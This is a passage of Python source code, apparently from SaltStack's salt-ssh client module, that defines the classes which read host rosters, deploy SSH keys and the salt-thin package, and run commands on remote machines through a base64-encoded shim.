MANPATH=$MANPATH XDG_DATA_DIRS=$XDG_DATA_DIRS \
PKG_CONFIG_PATH=$PKG_CONFIG_PATH \
"$py_cmd_path" -c \
'import base64;
exec(base64.b64decode("""{{SSH_PY_CODE}}""").decode("utf-8"))'
else
exec $SUDO "$py_cmd_path" -c \
'import base64;
exec(base64.b64decode("""{{SSH_PY_CODE}}""").decode("utf-8"))'
fi
exit 0
else
continue
fi
done
echo "ERROR: Unable to locate appropriate python command" >&2
exit $EX_PYTHON_INVALID
EOF'''.format(
EX_THIN_PYTHON_INVALID=salt.defaults.exitcodes.EX_THIN_PYTHON_INVALID,
).split(
"\n"
)
]
)
if not is_windows() and not is_junos():
shim_file = os.path.join(os.path.dirname(__file__), "ssh_py_shim.py")
if not os.path.exists(shim_file):
# On esky builds we only have the .pyc file
shim_file += "c"
with salt.utils.files.fopen(shim_file) as ssh_py_shim:
SSH_PY_SHIM = ssh_py_shim.read()
else:
SSH_PY_SHIM = None
log = logging.getLogger(__name__)
class SSH:
"""
Create an SSH execution system
"""
ROSTER_UPDATE_FLAG = "#__needs_update"
def __init__(self, opts):
self.__parsed_rosters = {SSH.ROSTER_UPDATE_FLAG: True}
pull_sock = os.path.join(opts["sock_dir"], "master_event_pull.ipc")
if os.path.exists(pull_sock) and zmq:
self.event = salt.utils.event.get_event(
"master", opts["sock_dir"], opts["transport"], opts=opts, listen=False
)
else:
self.event = None
self.opts = opts
if self.opts["regen_thin"]:
self.opts["ssh_wipe"] = True
if not salt.utils.path.which("ssh"):
raise salt.exceptions.SaltSystemExit(
code=-1,
msg=(
"No ssh binary found in path -- ssh must be installed for salt-ssh"
" to run. Exiting."
),
)
self.opts["_ssh_version"] = ssh_version()
self.tgt_type = (
self.opts["selected_target_option"]
if self.opts["selected_target_option"]
else "glob"
)
self._expand_target()
self.roster = salt.roster.Roster(self.opts, self.opts.get("roster", "flat"))
self.targets = self.roster.targets(self.opts["tgt"], self.tgt_type)
if not self.targets:
self._update_targets()
# If we're in a wfunc, we need to get the ssh key location from the
# top level opts, stored in __master_opts__
if "__master_opts__" in self.opts:
if self.opts["__master_opts__"].get("ssh_use_home_key") and os.path.isfile(
os.path.expanduser("~/.ssh/id_rsa")
):
priv = os.path.expanduser("~/.ssh/id_rsa")
else:
priv = self.opts["__master_opts__"].get(
"ssh_priv",
os.path.join(
self.opts["__master_opts__"]["pki_dir"], "ssh", "salt-ssh.rsa"
),
)
else:
priv = self.opts.get(
"ssh_priv", os.path.join(self.opts["pki_dir"], "ssh", "salt-ssh.rsa")
)
if priv != "agent-forwarding":
if not os.path.isfile(priv):
try:
salt.client.ssh.shell.gen_key(priv)
except OSError:
raise salt.exceptions.SaltClientError(
"salt-ssh could not be run because it could not generate"
" keys.\n\nYou can probably resolve this by executing this"
" script with increased permissions via sudo or by running as"
" root.\nYou could also use the '-c' option to supply a"
" configuration directory that you have permissions to read and"
" write to."
)
self.defaults = {
"user": self.opts.get(
"ssh_user", salt.config.DEFAULT_MASTER_OPTS["ssh_user"]
),
"port": self.opts.get(
"ssh_port", salt.config.DEFAULT_MASTER_OPTS["ssh_port"]
),
"passwd": self.opts.get(
"ssh_passwd", salt.config.DEFAULT_MASTER_OPTS["ssh_passwd"]
),
"priv": priv,
"priv_passwd": self.opts.get(
"ssh_priv_passwd", salt.config.DEFAULT_MASTER_OPTS["ssh_priv_passwd"]
),
"timeout": self.opts.get(
"ssh_timeout", salt.config.DEFAULT_MASTER_OPTS["ssh_timeout"]
)
+ self.opts.get("timeout", salt.config.DEFAULT_MASTER_OPTS["timeout"]),
"sudo": self.opts.get(
"ssh_sudo", salt.config.DEFAULT_MASTER_OPTS["ssh_sudo"]
),
"sudo_user": self.opts.get(
"ssh_sudo_user", salt.config.DEFAULT_MASTER_OPTS["ssh_sudo_user"]
),
"identities_only": self.opts.get(
"ssh_identities_only",
salt.config.DEFAULT_MASTER_OPTS["ssh_identities_only"],
),
"remote_port_forwards": self.opts.get("ssh_remote_port_forwards"),
"ssh_options": self.opts.get("ssh_options"),
}
if self.opts.get("rand_thin_dir"):
self.defaults["thin_dir"] = os.path.join(
"/var/tmp", ".{}".format(uuid.uuid4().hex[:6])
)
self.opts["ssh_wipe"] = "True"
self.serial = salt.payload.Serial(opts)
self.returners = salt.loader.returners(self.opts, {})
self.fsclient = salt.fileclient.FSClient(self.opts)
self.thin = salt.utils.thin.gen_thin(
self.opts["cachedir"],
extra_mods=self.opts.get("thin_extra_mods"),
overwrite=self.opts["regen_thin"],
python2_bin=self.opts["python2_bin"],
python3_bin=self.opts["python3_bin"],
extended_cfg=self.opts.get("ssh_ext_alternatives"),
)
self.mods = mod_data(self.fsclient)
@property
def parse_tgt(self):
"""
Method to determine the hostname and user
when bypassing the roster and using
ssh syntax (ex. root@localhost)
"""
if not self.opts.get("ssh_cli_tgt"):
self.opts["ssh_cli_tgt"] = self.opts.get("tgt", "")
hostname = self.opts.get("ssh_cli_tgt", "")
if "@" in hostname:
user, hostname = hostname.split("@", 1)
else:
user = self.opts.get("ssh_user")
return {"hostname": hostname, "user": user}
def _get_roster(self):
"""
Read roster filename as a key to the data.
:return:
"""
roster_file = salt.roster.get_roster_file(self.opts)
if roster_file not in self.__parsed_rosters:
roster_data = compile_template(
roster_file,
salt.loader.render(self.opts, {}),
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
)
self.__parsed_rosters[roster_file] = roster_data
return roster_file
def _expand_target(self):
"""
Figures out if the target is a reachable host without wildcards, expands if any.
:return:
"""
# TODO: Support -L
hostname = self.parse_tgt["hostname"]
if isinstance(hostname, list):
return
needs_expansion = "*" not in hostname and salt.utils.network.is_reachable_host(
hostname
)
if needs_expansion:
if hostname is None:
# Reverse lookup failed
return
self._get_roster()
for roster_filename in self.__parsed_rosters:
roster_data = self.__parsed_rosters[roster_filename]
if not isinstance(roster_data, bool):
for host_id in roster_data:
if hostname in [host_id, roster_data[host_id].get("host")]:
if hostname != self.opts["tgt"]:
self.opts["tgt"] = hostname
self.__parsed_rosters[self.ROSTER_UPDATE_FLAG] = False
return
def _update_roster(self):
"""
Update default flat roster with the passed in information.
:return:
"""
roster_file = self._get_roster()
if os.access(roster_file, os.W_OK):
if self.__parsed_rosters[self.ROSTER_UPDATE_FLAG]:
with salt.utils.files.fopen(roster_file, "a") as roster_fp:
roster_fp.write(
'# Automatically added by "{s_user}" at {s_time}\n{hostname}:\n'
" host: {hostname}\n user: {user}\n passwd: {passwd}\n".format(
s_user=getpass.getuser(),
s_time=datetime.datetime.utcnow().isoformat(),
hostname=self.opts.get("tgt", ""),
user=self.opts.get("ssh_user", ""),
passwd=self.opts.get("ssh_passwd", ""),
)
)
log.info(
"The host %s has been added to the roster %s",
self.opts.get("tgt", ""),
roster_file,
)
else:
log.error("Unable to update roster %s: access denied", roster_file)
def _update_targets(self):
"""
Uptade targets in case hostname was directly passed without the roster.
:return:
"""
hostname = self.parse_tgt["hostname"]
user = self.parse_tgt["user"]
if hostname == "*":
hostname = ""
if salt.utils.network.is_reachable_host(hostname):
self.opts["tgt"] = hostname
self.targets[hostname] = {
"passwd": self.opts.get("ssh_passwd", ""),
"host": hostname,
"user": user,
}
if self.opts.get("ssh_update_roster"):
self._update_roster()
def get_pubkey(self):
"""
Return the key string for the SSH public key
"""
if (
"__master_opts__" in self.opts
and self.opts["__master_opts__"].get("ssh_use_home_key")
and os.path.isfile(os.path.expanduser("~/.ssh/id_rsa"))
):
priv = os.path.expanduser("~/.ssh/id_rsa")
else:
priv = self.opts.get(
"ssh_priv", os.path.join(self.opts["pki_dir"], "ssh", "salt-ssh.rsa")
)
pub = "{}.pub".format(priv)
with salt.utils.files.fopen(pub, "r") as fp_:
return "{} rsa root@master".format(fp_.read().split()[1])
def key_deploy(self, host, ret):
"""
Deploy the SSH key if the minions don't auth
"""
if not isinstance(ret[host], dict) or self.opts.get("ssh_key_deploy"):
target = self.targets[host]
if target.get("passwd", False) or self.opts["ssh_passwd"]:
self._key_deploy_run(host, target, False)
return ret
if ret[host].get("stderr", "").count("Permission denied"):
target = self.targets[host]
# permission denied, attempt to auto deploy ssh key
print(
"Permission denied for host {}, do you want to deploy "
"the salt-ssh key? (password required):".format(host)
)
deploy = input("[Y/n] ")
if deploy.startswith(("n", "N")):
return ret
target["passwd"] = getpass.getpass(
"Password for {}@{}: ".format(target["user"], host)
)
return self._key_deploy_run(host, target, True)
return ret
def _key_deploy_run(self, host, target, re_run=True):
"""
The ssh-copy-id routine
"""
argv = [
"ssh.set_auth_key",
target.get("user", "root"),
self.get_pubkey(),
]
single = Single(
self.opts,
argv,
host,
mods=self.mods,
fsclient=self.fsclient,
thin=self.thin,
**target
)
if salt.utils.path.which("ssh-copy-id"):
# we have ssh-copy-id, use it!
stdout, stderr, retcode = single.shell.copy_id()
else:
stdout, stderr, retcode = single.run()
if re_run:
target.pop("passwd")
single = Single(
self.opts,
self.opts["argv"],
host,
mods=self.mods,
fsclient=self.fsclient,
thin=self.thin,
**target
)
stdout, stderr, retcode = single.cmd_block()
try:
data = salt.utils.json.find_json(stdout)
return {host: data.get("local", data)}
except Exception: # pylint: disable=broad-except
if stderr:
return {host: stderr}
return {host: "Bad Return"}
if salt.defaults.exitcodes.EX_OK != retcode:
return {host: stderr}
return {host: stdout}
def handle_routine(self, que, opts, host, target, mine=False):
"""
Run the routine in a "Thread", put a dict on the queue
"""
opts = copy.deepcopy(opts)
single = Single(
opts,
opts["argv"],
host,
mods=self.mods,
fsclient=self.fsclient,
thin=self.thin,
mine=mine,
**target
)
ret = {"id": single.id}
stdout, stderr, retcode = single.run()
# This job is done, yield
try:
data = salt.utils.json.find_json(stdout)
if len(data) < 2 and "local" in data:
ret["ret"] = data["local"]
else:
ret["ret"] = {
"stdout": stdout,
"stderr": stderr,
"retcode": retcode,
}
except Exception: # pylint: disable=broad-except
ret["ret"] = {
"stdout": stdout,
"stderr": stderr,
"retcode": retcode,
}
que.put(ret)
def handle_ssh(self, mine=False):
"""
Spin up the needed threads or processes and execute the subsequent
routines
"""
que = multiprocessing.Queue()
running = {}
target_iter = self.targets.__iter__()
returned = set()
rets = set()
init = False
while True:
if not self.targets:
log.error("No matching targets found in roster.")
break
if len(running) < self.opts.get("ssh_max_procs", 25) and not init:
try:
host = next(target_iter)
except StopIteration:
init = True
continue
for default in self.defaults:
if default not in self.targets[host]:
self.targets[host][default] = self.defaults[default]
if "host" not in self.targets[host]:
self.targets[host]["host"] = host
if self.targets[host].get("winrm") and not HAS_WINSHELL:
returned.add(host)
rets.add(host)
log_msg = (
"Please contact sales@saltstack.com for access to the"
" enterprise saltwinshell module."
)
log.debug(log_msg)
no_ret = {
"fun_args": [],
"jid": None,
"return": log_msg,
"retcode": 1,
"fun": "",
"id": host,
}
yield {host: no_ret}
continue
args = (
que,
self.opts,
host,
self.targets[host],
mine,
)
routine = Process(target=self.handle_routine, args=args)
routine.start()
running[host] = {"thread": routine}
continue
ret = {}
try:
ret = que.get(False)
if "id" in ret:
returned.add(ret["id"])
yield {ret["id"]: ret["ret"]}
except Exception: # pylint: disable=broad-except
# This bare exception is here to catch spurious exceptions
# thrown by que.get during healthy operation. Please do not
# worry about this bare exception, it is entirely here to
# control program flow.
pass
for host in running:
if not running[host]["thread"].is_alive():
if host not in returned:
# Try to get any returns that came through since we
# last checked
try:
while True:
ret = que.get(False)
if "id" in ret:
returned.add(ret["id"])
yield {ret["id"]: ret["ret"]}
except Exception: # pylint: disable=broad-except
pass
if host not in returned:
error = (
"Target '{}' did not return any data, "
"probably due to an error.".format(host)
)
ret = {"id": host, "ret": error}
log.error(error)
yield {ret["id"]: ret["ret"]}
running[host]["thread"].join()
rets.add(host)
for host in rets:
if host in running:
running.pop(host)
if len(rets) >= len(self.targets):
break
# Sleep when limit or all threads started
if len(running) >= self.opts.get("ssh_max_procs", 25) or len(
self.targets
) >= len(running):
time.sleep(0.1)
def run_iter(self, mine=False, jid=None):
"""
Execute and yield returns as they come in, do not print to the display
mine
The Single objects will use mine_functions defined in the roster,
pillar, or master config (they will be checked in that order) and
will modify the argv with the arguments from mine_functions
"""
fstr = "{}.prep_jid".format(self.opts["master_job_cache"])
jid = self.returners[fstr](passed_jid=jid or self.opts.get("jid", None))
# Save the invocation information
argv = self.opts["argv"]
if self.opts.get("raw_shell", False):
fun = "ssh._raw"
args = argv
else:
fun = argv[0] if argv else ""
args = argv[1:]
job_load = {
"jid": jid,
"tgt_type": self.tgt_type,
"tgt": self.opts["tgt"],
"user": self.opts["user"],
"fun": fun,
"arg": args,
}
# save load to the master job cache
if self.opts["master_job_cache"] == "local_cache":
self.returners["{}.save_load".format(self.opts["master_job_cache"])](
jid, job_load, minions=self.targets.keys()
)
else:
self.returners["{}.save_load".format(self.opts["master_job_cache"])](
jid, job_load
)
for ret in self.handle_ssh(mine=mine):
host = next(iter(ret.keys()))
self.cache_job(jid, host, ret[host], fun)
if self.event:
id_, data = next(iter(ret.items()))
if isinstance(data, str):
data = {"return": data}
if "id" not in data:
data["id"] = id_
if "fun" not in data:
data["fun"] = fun
data[
"jid"
] = jid # make the jid in the payload the same as the jid in the tag
self.event.fire_event(
data, salt.utils.event.tagify([jid, "ret", host], "job")
)
yield ret
def cache_job(self, jid, id_, ret, fun):
"""
Cache the job information
"""
self.returners["{}.returner".format(self.opts["master_job_cache"])](
{"jid": jid, "id": id_, "return": ret, "fun": fun}
)
def run(self, jid=None):
"""
Execute the overall routine, print results via outputters
"""
if self.opts.get("list_hosts"):
self._get_roster()
ret = {}
for roster_file in self.__parsed_rosters:
if roster_file.startswith("#"):
continue
ret[roster_file] = {}
for host_id in self.__parsed_rosters[roster_file]:
hostname = self.__parsed_rosters[roster_file][host_id]["host"]
ret[roster_file][host_id] = hostname
salt.output.display_output(ret, "nested", self.opts)
sys.exit()
fstr = "{}.prep_jid".format(self.opts["master_job_cache"])
jid = self.returners[fstr](passed_jid=jid or self.opts.get("jid", None))
# Save the invocation information
argv = self.opts["argv"]
if self.opts.get("raw_shell", False):
fun = "ssh._raw"
args = argv
else:
fun = argv[0] if argv else ""
args = argv[1:]
job_load = {
"jid": jid,
"tgt_type": self.tgt_type,
"tgt": self.opts["tgt"],
"user": self.opts["user"],
"fun": fun,
"arg": args,
}
# save load to the master job cache
try:
if isinstance(jid, bytes):
jid = jid.decode("utf-8")
if self.opts["master_job_cache"] == "local_cache":
self.returners["{}.save_load".format(self.opts["master_job_cache"])](
jid, job_load, minions=self.targets.keys()
)
else:
self.returners["{}.save_load".format(self.opts["master_job_cache"])](
jid, job_load
)
except Exception as exc: # pylint: disable=broad-except
log.error(
"Could not save load with returner %s: %s",
self.opts["master_job_cache"],
exc,
exc_info=True,
)
if self.opts.get("verbose"):
msg = "Executing job with jid {}".format(jid)
print(msg)
print("-" * len(msg) + "\n")
print("")
sret = {}
outputter = self.opts.get("output", "nested")
final_exit = 0
for ret in self.handle_ssh():
host = next(iter(ret.keys()))
if isinstance(ret[host], dict):
host_ret = ret[host].get("retcode", 0)
if host_ret != 0:
final_exit = 1
else:
# Error on host
final_exit = 1
self.cache_job(jid, host, ret[host], fun)
ret = self.key_deploy(host, ret)
if isinstance(ret[host], dict) and (
ret[host].get("stderr") or ""
).startswith("ssh:"):
ret[host] = ret[host]["stderr"]
if not isinstance(ret[host], dict):
p_data = {host: ret[host]}
elif "return" not in ret[host]:
p_data = ret
else:
outputter = ret[host].get("out", self.opts.get("output", "nested"))
p_data = {host: ret[host].get("return", {})}
if self.opts.get("static"):
sret.update(p_data)
else:
salt.output.display_output(p_data, outputter, self.opts)
if self.event:
id_, data = next(iter(ret.items()))
if isinstance(data, str):
data = {"return": data}
if "id" not in data:
data["id"] = id_
if "fun" not in data:
data["fun"] = fun
data[
"jid"
] = jid # make the jid in the payload the same as the jid in the tag
self.event.fire_event(
data, salt.utils.event.tagify([jid, "ret", host], "job")
)
if self.event is not None:
self.event.destroy()
if self.opts.get("static"):
salt.output.display_output(sret, outputter, self.opts)
if final_exit:
sys.exit(salt.defaults.exitcodes.EX_AGGREGATE)
class Single:
"""
Hold onto a single ssh execution
"""
# 1. Get command ready
# 2. Check if target has salt
# 3. deploy salt-thin
# 4. execute requested command via salt-thin
def __init__(
self,
opts,
argv,
id_,
host,
user=None,
port=None,
passwd=None,
priv=None,
priv_passwd=None,
timeout=30,
sudo=False,
tty=False,
mods=None,
fsclient=None,
thin=None,
mine=False,
minion_opts=None,
identities_only=False,
sudo_user=None,
remote_port_forwards=None,
winrm=False,
ssh_options=None,
**kwargs
):
# Get mine setting and mine_functions if defined in kwargs (from roster)
self.mine = mine
self.mine_functions = kwargs.get("mine_functions")
self.cmd_umask = kwargs.get("cmd_umask", None)
self.winrm = winrm
self.opts = opts
self.tty = tty
if kwargs.get("disable_wipe"):
self.wipe = False
else:
self.wipe = bool(self.opts.get("ssh_wipe"))
if kwargs.get("thin_dir"):
self.thin_dir = kwargs["thin_dir"]
elif self.winrm:
saltwinshell.set_winvars(self)
self.python_env = kwargs.get("ssh_python_env")
else:
if user:
thin_dir = DEFAULT_THIN_DIR.replace("%%USER%%", user)
else:
thin_dir = DEFAULT_THIN_DIR.replace("%%USER%%", "root")
self.thin_dir = thin_dir.replace(
"%%FQDNUUID%%",
uuid.uuid3(uuid.NAMESPACE_DNS, salt.utils.network.get_fqhostname()).hex[
:6
],
)
self.opts["thin_dir"] = self.thin_dir
self.fsclient = fsclient
self.context = {"master_opts": self.opts, "fileclient": self.fsclient}
self.ssh_pre_flight = kwargs.get("ssh_pre_flight", None)
if self.ssh_pre_flight:
self.ssh_pre_file = os.path.basename(self.ssh_pre_flight)
if isinstance(argv, str):
self.argv = [argv]
else:
self.argv = argv
self.fun, self.args, self.kwargs = self.__arg_comps()
self.id = id_
self.set_path = kwargs.get("set_path", "")
self.mods = mods if isinstance(mods, dict) else {}
args = {
"host": host,
"user": user,
"port": port,
"passwd": passwd,
"priv": priv,
"priv_passwd": priv_passwd,
"timeout": timeout,
"sudo": sudo,
"tty": tty,
"mods": self.mods,
"identities_only": identities_only,
"sudo_user": sudo_user,
"remote_port_forwards": remote_port_forwards,
"winrm": winrm,
"ssh_options": ssh_options,
}
# Pre apply changeable defaults
self.minion_opts = {
"grains_cache": True,
"log_file": "salt-call.log",
}
self.minion_opts.update(opts.get("ssh_minion_opts", {}))
if minion_opts is not None:
self.minion_opts.update(minion_opts)
# Post apply system needed defaults
self.minion_opts.update(
{
"root_dir": os.path.join(self.thin_dir, "running_data"),
"id": self.id,
"sock_dir": "/",
"fileserver_list_cache_time": 3,
}
)
self.minion_config = salt.serializers.yaml.serialize(self.minion_opts)
self.target = kwargs
self.target.update(args)
self.serial = salt.payload.Serial(opts)
self.wfuncs = salt.loader.ssh_wrapper(opts, None, self.context)
self.shell = salt.client.ssh.shell.gen_shell(opts, **args)
if self.winrm:
# Determine if Windows client is x86 or AMD64
arch, _, _ = self.shell.exec_cmd("powershell $ENV:PROCESSOR_ARCHITECTURE")
self.arch = arch.strip()
self.thin = thin if thin else salt.utils.thin.thin_path(opts["cachedir"])
def __arg_comps(self):
"""
Return the function name and the arg list
"""
fun = self.argv[0] if self.argv else ""
parsed = salt.utils.args.parse_input(
self.argv[1:], condition=False, no_parse=self.opts.get("no_parse", [])
)
args = parsed[0]
kws = parsed[1]
return fun, args, kws
def _escape_arg(self, arg):
"""
Properly escape argument to protect special characters from shell
interpretation. This avoids having to do tricky argument quoting.
Effectively just escape all characters in the argument that are not
alphanumeric!
"""
if self.winrm:
return arg
return "".join(["\\" + char if re.match(r"\W", char) else char for char in arg])
def run_ssh_pre_flight(self):
"""
Run our pre_flight script before running any ssh commands
"""
script = os.path.join(tempfile.gettempdir(), self.ssh_pre_file)
self.shell.send(self.ssh_pre_flight, script)
return self.execute_script(script)
def check_thin_dir(self):
"""
check if the thindir exists on the remote machine
"""
stdout, stderr, retcode = self.shell.exec_cmd(
"test -d {}".format(self.thin_dir)
)
if retcode != 0:
return False
return True
def deploy(self):
"""
Deploy salt-thin
"""
self.shell.send(
self.thin,
os.path.join(self.thin_dir, "salt-thin.tgz"),
)
self.deploy_ext()
return True
def deploy_ext(self):
"""
Deploy the ext_mods tarball
"""
if self.mods.get("file"):
self.shell.send(
self.mods["file"],
os.path.join(self.thin_dir, "salt-ext_mods.tgz"),
)
return True
def run(self, deploy_attempted=False):
"""
Execute the routine, the routine can be either:
1. Execute a raw shell command
2. Execute a wrapper func
3. Execute a remote Salt command
If a (re)deploy is needed, then retry the operation after a deploy
attempt
Returns tuple of (stdout, stderr, retcode)
"""
stdout = stderr = retcode = None
if self.ssh_pre_flight:
if not self.opts.get("ssh_run_pre_flight", False) and self.check_thin_dir():
log.info(
"%s thin dir already exists. Not running ssh_pre_flight script",
self.thin_dir,
)
elif not os.path.exists(self.ssh_pre_flight):
log.error(
"The ssh_pre_flight script %s does not exist", self.ssh_pre_flight
)
else:
stdout, stderr, retcode = self.run_ssh_pre_flight()
if retcode != 0:
log.error(
"Error running ssh_pre_flight script %s", self.ssh_pre_file
)
return stdout, stderr, retcode
log.info(
"Successfully ran the ssh_pre_flight script: %s", self.ssh_pre_file
)
if self.opts.get("raw_shell", False):
cmd_str = " ".join([self._escape_arg(arg) for arg in self.argv])
stdout, stderr, retcode = self.shell.exec_cmd(cmd_str)
elif self.fun in self.wfuncs or self.mine:
stdout, retcode = self.run_wfunc()
else:
stdout, stderr, retcode = self.cmd_block()
return stdout, stderr, retcode
def run_wfunc(self):
"""
Execute a wrapper function
Returns tuple of (json_data, '')
"""
# Ensure that opts/grains are up to date
# Execute routine
data_cache = False
data = None
cdir = os.path.join(self.opts["cachedir"], "minions", self.id)
if not os.path.isdir(cdir):
os.makedirs(cdir)
datap = os.path.join(cdir, "ssh_data.p")
refresh = False
if not os.path.isfile(datap):
refresh = True
else:
passed_time = (time.time() - os.stat(datap).st_mtime) / 60
if passed_time > self.opts.get("cache_life", 60):
refresh = True
if self.opts.get("refresh_cache"):
refresh = True
conf_grains = {}
# Save conf file grains before they get clobbered
if "ssh_grains" in self.opts:
conf_grains = self.opts["ssh_grains"]
if not data_cache:
refresh = True
if refresh:
# Make the datap
# TODO: Auto expire the datap
pre_wrapper = salt.client.ssh.wrapper.FunctionWrapper(
self.opts,
self.id,
fsclient=self.fsclient,
minion_opts=self.minion_opts,
**self.target
)
opts_pkg = pre_wrapper["test.opts_pkg"]() # pylint: disable=E1102
if "_error" in opts_pkg:
# Refresh failed
retcode = opts_pkg["retcode"]
ret = salt.utils.json.dumps({"local": opts_pkg})
return ret, retcode
opts_pkg["file_roots"] = self.opts["file_roots"]
opts_pkg["pillar_roots"] = self.opts["pillar_roots"]
opts_pkg["ext_pillar"] = self.opts["ext_pillar"]
opts_pkg["extension_modules"] = self.opts["extension_modules"]
opts_pkg["module_dirs"] = self.opts["module_dirs"]
opts_pkg["_ssh_version"] = self.opts["_ssh_version"]
opts_pkg["thin_dir"] = self.opts["thin_dir"]
opts_pkg["master_tops"] = self.opts["master_tops"]
opts_pkg["__master_opts__"] = self.context["master_opts"]
if "known_hosts_file" in self.opts:
opts_pkg["known_hosts_file"] = self.opts["known_hosts_file"]
if "_caller_cachedir" in self.opts:
opts_pkg["_caller_cachedir"] = self.opts["_caller_cachedir"]
else:
opts_pkg["_caller_cachedir"] = self.opts["cachedir"]
# Use the ID defined in the roster file
opts_pkg["id"] = self.id
retcode = 0
# Restore master grains
for grain in conf_grains:
opts_pkg["grains"][grain] = conf_grains[grain]
# Enable roster grains support
if "grains" in self.target:
for grain in self.target["grains"]:
opts_pkg["grains"][grain] = self.target["grains"][grain]
popts = {}
popts.update(opts_pkg["__master_opts__"])
popts.update(opts_pkg)
pillar = salt.pillar.Pillar(
popts,
opts_pkg["grains"],
opts_pkg["id"],
opts_pkg.get("saltenv", "base"),
)
pillar_data = pillar.compile_pillar()
# TODO: cache minion opts in datap in master.py
data = {
"opts": opts_pkg,
"grains": opts_pkg["grains"],
"pillar": pillar_data,
}
if data_cache:
with salt.utils.files.fopen(datap, "w+b") as fp_:
fp_.write(self.serial.dumps(data))
if not data and data_cache:
with salt.utils.files.fopen(datap, "rb") as fp_:
data = self.serial.load(fp_)
opts = data.get("opts", {})
opts["grains"] = data.get("grains")
# Restore master grains
for grain in conf_grains:
opts["grains"][grain] = conf_grains[grain]
# Enable roster grains support
if "grains" in self.target:
for grain in self.target["grains"]:
opts["grains"][grain] = self.target["grains"][grain]
opts["pillar"] = data.get("pillar")
wrapper = salt.client.ssh.wrapper.FunctionWrapper(
opts,
self.id,
fsclient=self.fsclient,
minion_opts=self.minion_opts,
**self.target
)
wrapper.fsclient.opts["cachedir"] = opts["cachedir"]
self.wfuncs = salt.loader.ssh_wrapper(opts, wrapper, self.context)
wrapper.wfuncs = self.wfuncs
# We're running in the mine, need to fetch the arguments from the
# roster, pillar, master config (in that order)
if self.mine:
mine_args = None
mine_fun_data = None
mine_fun = self.fun
if self.mine_functions and self.fun in self.mine_functions:
mine_fun_data = self.mine_functions[self.fun]
elif opts["pillar"] and self.fun in opts["pillar"].get(
"mine_functions", {}
):
mine_fun_data = opts["pillar"]["mine_functions"][self.fun]
elif self.fun in self.context["master_opts"].get("mine_functions", {}):
mine_fun_data = self.context["master_opts"]["mine_functions"][self.fun]
if isinstance(mine_fun_data, dict):
mine_fun = mine_fun_data.pop("mine_function", mine_fun)
mine_args = mine_fun_data
elif isinstance(mine_fun_data, list):
for item in mine_fun_data[:]:
if isinstance(item, dict) and "mine_function" in item:
mine_fun = item["mine_function"]
mine_fun_data.pop(mine_fun_data.index(item))
mine_args = mine_fun_data
else:
mine_args = mine_fun_data
# If we found mine_args, replace our command's args
if isinstance(mine_args, dict):
self.args = []
self.kwargs = mine_args
elif isinstance(mine_args, list):
self.args = mine_args
self.kwargs = {}
try:
if self.mine:
result = wrapper[mine_fun](*self.args, **self.kwargs)
else:
result = self.wfuncs[self.fun](*self.args, **self.kwargs)
except TypeError as exc:
result = "TypeError encountered executing {}: {}".format(self.fun, exc)
log.error(result, exc_info_on_loglevel=logging.DEBUG)
retcode = 1
except Exception as exc: # pylint: disable=broad-except
result = "An Exception occurred while executing {}: {}".format(
self.fun, exc
)
log.error(result, exc_info_on_loglevel=logging.DEBUG)
retcode = 1
# Mimic the json data-structure that "salt-call --local" will
# emit (as seen in ssh_py_shim.py)
if isinstance(result, dict) and "local" in result:
ret = salt.utils.json.dumps({"local": result["local"]})
else:
ret = salt.utils.json.dumps({"local": {"return": result}})
return ret, retcode
def _cmd_str(self):
"""
Prepare the command string
"""
sudo = "sudo" if self.target["sudo"] else ""
sudo_user = self.target["sudo_user"]
if "_caller_cachedir" in self.opts:
cachedir = self.opts["_caller_cachedir"]
else:
cachedir = self.opts["cachedir"]
thin_code_digest, thin_sum = salt.utils.thin.thin_sum(cachedir, "sha1")
debug = ""
if not self.opts.get("log_level"):
self.opts["log_level"] = "info"
if (
salt.log.LOG_LEVELS["debug"]
>= salt.log.LOG_LEVELS[self.opts.get("log_level", "info")]
):
debug = "1"
arg_str = '''
OPTIONS.config = \
"""
{config}
"""
OPTIONS.delimiter = '{delimeter}'
OPTIONS.saltdir = '{saltdir}'
OPTIONS.checksum = '{checksum}'
OPTIONS.hashfunc = '{hashfunc}'
OPTIONS.version = '{version}'
OPTIONS.ext_mods = '{ext_mods}'
OPTIONS.wipe = {wipe}
OPTIONS.tty = {tty}
OPTIONS.cmd_umask = {cmd_umask}
OPTIONS.code_checksum = {code_checksum}
ARGS = {arguments}\n'''.format(
config=self.minion_config,
delimeter=RSTR,
saltdir=self.thin_dir,
checksum=thin_sum,
hashfunc="sha1",
version=salt.version.__version__,
ext_mods=self.mods.get("version", ""),
wipe=self.wipe,
tty=self.tty,
cmd_umask=self.cmd_umask,
code_checksum=thin_code_digest,
arguments=self.argv,
)
py_code = SSH_PY_SHIM.replace("#%%OPTS", arg_str)
py_code_enc = base64.encodebytes(py_code.encode("utf-8")).decode("utf-8")
if not self.winrm:
cmd = SSH_SH_SHIM.format(
DEBUG=debug,
SUDO=sudo,
SUDO_USER=sudo_user,
SSH_PY_CODE=py_code_enc,
HOST_PY_MAJOR=sys.version_info[0],
SET_PATH=self.set_path,
)
else:
cmd = saltwinshell.gen_shim(py_code_enc)
return cmd
def execute_script(self, script, extension="py", pre_dir=""):
"""
execute a script on the minion then delete
"""
if extension == "ps1":
ret = self.shell.exec_cmd('"powershell {}"'.format(script))
else:
if not self.winrm:
ret = self.shell.exec_cmd("/bin/sh '{}{}'".format(pre_dir, script))
else:
ret = saltwinshell.call_python(self, script)
# Remove file from target system
if not self.winrm:
self.shell.exec_cmd("rm '{}{}'".format(pre_dir, script))
else:
self.shell.exec_cmd("del {}".format(script))
return ret
def shim_cmd(self, cmd_str, extension="py"):
"""
Run a shim command.
If tty is enabled, we must scp the shim to the target system and
execute it there
"""
if not self.tty and not self.winrm:
return self.shell.exec_cmd(cmd_str)
# Write the shim to a temporary file in the default temp directory
with tempfile.NamedTemporaryFile(
mode="w+b", prefix="shim_", delete=False
) as shim_tmp_file:
shim_tmp_file.write(salt.utils.stringutils.to_bytes(cmd_str))
# Copy shim to target system, under $HOME/.<randomized name>
target_shim_file = ".{}.{}".format(
binascii.hexlify(os.urandom(6)).decode("ascii"), extension
)
if self.winrm:
target_shim_file = saltwinshell.get_target_shim_file(self, target_shim_file)
self.shell.send(shim_tmp_file.name, target_shim_file, makedirs=True)
# Remove our shim file
try:
os.remove(shim_tmp_file.name)
except OSError:
pass
ret = self.execute_script(script=target_shim_file, extension=extension)
return ret
def cmd_block(self, is_retry=False):
"""
Prepare the pre-check command to send to the subsystem
1. execute SHIM + command
2. check if SHIM returns a master request or if it completed
3. handle any master request
4. re-execute SHIM + command
